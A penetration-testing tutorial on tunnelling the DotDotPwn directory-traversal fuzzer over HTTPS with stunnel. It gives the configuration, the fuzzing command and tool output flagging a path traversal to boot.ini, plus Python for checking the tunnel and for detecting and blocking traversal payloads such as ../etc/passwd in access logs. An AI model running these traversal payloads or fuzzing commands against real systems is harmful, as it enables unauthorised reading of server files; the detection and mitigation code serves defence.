DotDotPwn HTTPS mode

References:
http://www.spentera.com/2012/03/directory-traversal-with-dotdotpwn-https-mode/
https://www.stunnel.org/howto.html
This uses the stunnel program; see the stunnel site:
https://www.stunnel.org/index.html
stunnel is installed by default on Kali.
It can also be downloaded from the site and installed.
Build the binary from source:
1. wget https://www.stunnel.org/downloads/stunnel-5.07.tar.gz
2. tar vxf stunnel-5.07.tar.gz
3. cd stunnel-5.07/
4. ./configure
5. make
6. make install

Generate the SSL pem file
root@kali:~# openssl req -new -x509 -days 365 -nodes -out stunnel.pem -keyout stunnel.pem

Configuration parameters:
root@kali:~# cat stunnel.conf
cert = /root/stunnel.pem
#Some security enhancements for UNIX systems - comment them out on Win32
client = yes
#options=NO_SSLv2
debug = 5

; Service-level configuration
[https]
accept = 127.0.0.1:8080
connect = 206.190.36.45:443

[Note] The 206.190.36.45 used here is Yahoo's IP; in a real environment, replace it with the IP you actually need.
Run stunnel
bash-3.2# stunnel /opt/local/etc/stunnel/stunnel.conf

If there are no errors, no log output appears.
Verify the HTTPS connection:
root@kali:~# nc 127.0.0.1 8080
GET / HTTP/1.1
Host:yahoo.com

HTTP/1.1 301 Redirect
Date: Wed, 05 Nov 2014 14:24:54 GMT
Via: http/1.1 ir8.fp.gq1.yahoo.com (ApacheTrafficServer)
Server: ATS
Location: https://www.yahoo.com/
Content-Type: text/html
Content-Language: en
Cache-Control: no-store, no-cache
Connection: keep-alive
Content-Length: 1450
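The same check as the nc session above, scripted, as an added example that is not part of the original post: it sends a cleartext HTTP request to stunnel's accept address and parses the response head, which is all the tunnel client ever sees (stunnel adds TLS on the way to the remote side). SAMPLE_RESPONSE is the head of the response shown above, embedded as constructed test input so the parser can be exercised offline; check_tunnel assumes stunnel is listening on 127.0.0.1:8080 as in the stunnel.conf above, and the host header is an assumed value.

```python
import socket

# Constructed sample: the head of the response captured above, used as offline
# input for parse_response_head (the body after the blank line is omitted).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 301 Redirect\r\n"
    b"Date: Wed, 05 Nov 2014 14:24:54 GMT\r\n"
    b"Server: ATS\r\n"
    b"Location: https://www.yahoo.com/\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 1450\r\n"
    b"\r\n"
)


def build_request(host_header, path="/"):
    """Plain HTTP/1.1 request bytes; no TLS here, stunnel wraps the connection."""
    return (f"GET {path} HTTP/1.1\r\n"
            f"Host: {host_header}\r\n"
            f"Connection: close\r\n\r\n").encode("ascii")


def parse_response_head(raw):
    """Return (status_code, headers) parsed from the bytes up to the first blank line."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    version, code, *_ = lines[0].split(" ", 2)
    if not version.startswith("HTTP/"):
        raise ValueError("not an HTTP response: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(code), headers


def check_tunnel(local_host="127.0.0.1", local_port=8080,
                 host_header="yahoo.com", timeout=10):
    """Send a cleartext request to stunnel's accept address (assumed 127.0.0.1:8080)
    and return the parsed response head from the remote HTTPS server."""
    with socket.create_connection((local_host, local_port), timeout=timeout) as s:
        s.sendall(build_request(host_header))
        raw = b""
        while b"\r\n\r\n" not in raw:
            chunk = s.recv(4096)
            if not chunk:
                break
            raw += chunk
    return parse_response_head(raw)


if __name__ == "__main__":
    status, hdrs = check_tunnel()
    print(status, hdrs.get("location"))
```

A 3xx or 2xx status with the remote server's headers confirms the tunnel is passing traffic. Note that the stunnel.conf above does not enable certificate verification (stunnel's verify option), so stunnel accepts whatever certificate the remote side presents; this check proves the tunnel is up, not that it reached the host you intended.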

Then the dotdotpwn test can be run:
bash-3.2# perl dotdotpwn.pl -m http-url -h 127.0.0.1 -x 8080 -O -s -u http://127.0.0.1:8080/cms/print.php?page=TRAVERSAL -k WINDOWS -b -q

[+] Report name: Reports/127.0.0.1_03-18-2012_23-59.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: 127.0.0.1
[+] Detecting Operating System (nmap) ...
[+] Operating System detected: 
[+] Protocol: http
[+] Port: 8080
[+] Service detected:
Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d mod_autoindex_color PHP/5.2.1
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 14640

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[+] Replacing "TRAVERSAL" with the traversals created and sending
. . 
[*] Testing URL: http://127.0.0.1:8080/cms/print.php?page=../../../../../boot.ini <== VULNERABLE

[+] Fuzz testing finished after 0.08 minutes (5 seconds)
[+] Total Traversals found: 1
[+] Report saved: Reports/127.0.0.1_03-18-2012_23-59.txt
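On the defending side, a run like the one above leaves requests of the form print.php?page=../../../../../boot.ini in the web server's access log, and the underlying bug is an include parameter that is joined to a directory without being confined to it. The following is an added example, not code from the original post or from DotDotPwn: it scans constructed Common Log Format lines for traversal attempts against the page parameter (decoding the percent-encoded and backslash variants a fuzzer sends) and shows the mitigation a print.php-style include should apply, resolving the value under a base directory and rejecting anything that escapes it. WEB_ROOT, INCLUDE_PARAM and the log lines are assumed values.

```python
import posixpath
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed values for this example; adjust to the application being defended.
WEB_ROOT = "/var/www/cms"   # directory the include parameter must stay inside
INCLUDE_PARAM = "page"      # the parameter fuzzed above: print.php?page=TRAVERSAL

# Constructed sample access-log lines (Common Log Format), not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Mar/2012:23:59:01 +0000] "GET /cms/print.php?page=about HTTP/1.1" 200 512
10.0.0.5 - - [18/Mar/2012:23:59:02 +0000] "GET /cms/print.php?page=../../../../../boot.ini HTTP/1.1" 200 310
10.0.0.5 - - [18/Mar/2012:23:59:03 +0000] "GET /cms/print.php?page=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 0
10.0.0.5 - - [18/Mar/2012:23:59:04 +0000] "GET /cms/print.php?page=%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1" 200 120
10.0.0.5 - - [18/Mar/2012:23:59:05 +0000] "GET /cms/print.php?page=....//....//etc/passwd HTTP/1.1" 403 0
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
DOTS_RE = re.compile(r"\.{2,}/")   # '..', '....', ... followed by a separator


def normalize(value, rounds=3):
    """Percent-decode until stable (fuzzers double-encode) and unify separators."""
    for _ in range(rounds):
        decoded = re.sub(r"%([0-9A-Fa-f]{2})",
                         lambda m: chr(int(m.group(1), 16)), value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def safe_include_path(value, root=WEB_ROOT):
    """Mitigation: resolve value under root and return the path, or None if it
    would land outside root. Resolve-then-check, rather than stripping '../'."""
    resolved = posixpath.normpath(posixpath.join(root, normalize(value)))
    if resolved == root or resolved.startswith(root + "/"):
        return resolved
    return None


def is_traversal_attempt(value, root=WEB_ROOT):
    """Detection: flag values that escape root or still carry dot-runs before a slash."""
    return safe_include_path(value, root) is None or DOTS_RE.search(normalize(value)) is not None


def scan_log(text, param=INCLUDE_PARAM):
    """Return (line_no, status, decoded_value) for requests that look like traversal."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == param and is_traversal_attempt(value):
                hits.append((n, int(m.group("status")), normalize(value)))
    return hits


if __name__ == "__main__":
    for n, status, value in scan_log(SAMPLE_LOG):
        tag = "likely succeeded" if status == 200 else "blocked or missed"
        print(f"line {n}: {tag}: page={value}")
```

A flagged request that returned 200 is the one to investigate first, since that is exactly how DotDotPwn recognised boot.ini above. safe_include_path treats the ....// pattern as harmless because it resolves the path before checking the prefix instead of stripping ../ (which is the filter that pattern is built to bypass); the detector still reports it, since a dot-run before a separator has no legitimate use in a page name. In a real application, resolve with os.path.realpath so symlinks cannot point outside the root, and prefer an allowlist of page names over any path check.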
